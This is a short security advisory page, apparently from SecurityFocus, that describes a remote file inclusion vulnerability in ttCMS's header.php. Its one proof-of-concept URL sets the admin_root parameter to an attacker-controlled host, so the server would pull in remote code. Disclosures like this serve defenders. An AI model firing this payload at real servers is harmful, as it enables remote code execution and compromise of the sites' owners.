info
discussion
exploit
solution
references
ttCMS Header.PHP Remote File Include Vulnerability
The following proof of concept was provided:
http://target/admin/templates/header.php?admin_root=http://attacker/
Privacy Statement
Copyright 2010, SecurityFocus